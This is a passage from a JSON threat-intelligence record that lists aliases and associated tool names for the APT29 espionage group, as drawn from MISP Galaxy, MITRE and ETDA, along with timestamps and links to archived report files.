				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434409,
	"ts_updated_at": 1775792252,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0ba1f2de8fff45674c76ba94ef6f45916cb02838.pdf",
		"text": "https://archive.orkl.eu/0ba1f2de8fff45674c76ba94ef6f45916cb02838.txt",
		"img": "https://archive.orkl.eu/0ba1f2de8fff45674c76ba94ef6f45916cb02838.jpg"
	}
}